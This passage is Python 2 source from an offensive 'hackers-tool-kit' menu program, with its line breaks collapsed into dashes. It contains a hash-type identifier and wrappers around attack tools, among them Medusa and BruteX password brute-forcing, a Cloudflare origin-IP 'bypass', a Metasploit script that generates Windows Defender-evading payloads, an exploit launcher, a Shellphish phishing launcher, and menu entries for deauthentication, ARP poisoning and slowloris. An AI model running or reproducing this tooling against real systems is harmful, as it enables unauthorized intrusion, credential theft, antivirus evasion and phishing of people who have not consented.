hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - 